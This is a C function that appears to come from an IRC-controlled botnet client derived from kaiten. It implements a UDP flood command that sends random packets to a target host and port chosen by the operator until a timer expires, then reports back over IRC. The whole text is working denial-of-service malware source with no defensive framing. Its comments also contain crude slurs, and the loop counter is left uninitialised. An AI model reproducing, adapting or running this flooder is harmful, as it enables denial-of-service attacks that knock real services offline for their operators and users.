void unknown(int sock, char *sender, int argc, char **argv) { /* Non spoof UDP flooder Now has port and packetsize options and an option for random port and packetsize! (just enter 0) Each packet is unique! Cheers homies. only shout iz here and it is to: kod for all the help you gave me and showing me kaiten in the first place! luv u bb <3 */ int fd,i,packetsize,index; // int flag = 1; int randport = 0; int randsize = 0; unsigned long secs; struct hostent *hp; struct sockaddr_in in; time_t start = time(NULL); char *packsize; if(argc < 4) { Send(sock, "NOTICE %s :UNKNOWN \n", sender); exit(1); } if(mfork(sender) != 0) return; unsigned char *packet = malloc(1024); memset(packet, 0, 1024); if(!strcmp(argv[2],"0")) { randport = 1; } if(!strcmp(argv[3],"0")) { randsize = 1; packsize = "random"; } else { packsize = argv[3]; } srand(time(NULL)); secs=atol(argv[4]); memset((void*)&in,0,sizeof(struct sockaddr_in)); in.sin_addr.s_addr=host2ip(sender,argv[1]); in.sin_family = AF_INET; if(randport == 0) { in.sin_port = htons(atoi(argv[2])); packsize = argv[3]; } Send(sock, "NOTICE %s :Unknowning %s:%s with packet size %s\n", sender, argv[1], argv[2], packsize); while(1) { if(randport == 1) { in.sin_port = htons(realrand(1026, 65535)); } if(randsize == 1) { makeRandomShit(packet, realrand(64, 1024)); } else { makeRandomShit(packet, atoi(argv[3])); } if((fd = socket(AF_INET,SOCK_DGRAM,IPPROTO_UDP)) < 0); else { // ioctl(fd, FIONBIO, &flag); whoever did this was fucking retarded lmao sendto(fd, packet, strlen(packet), 0, (struct sockaddr*)&in, sizeof(in)); close(fd); } if(i >= 100) { if(time(NULL) >= start+secs) { break; } else { i=0; } } i++; } close(fd); exit(0); }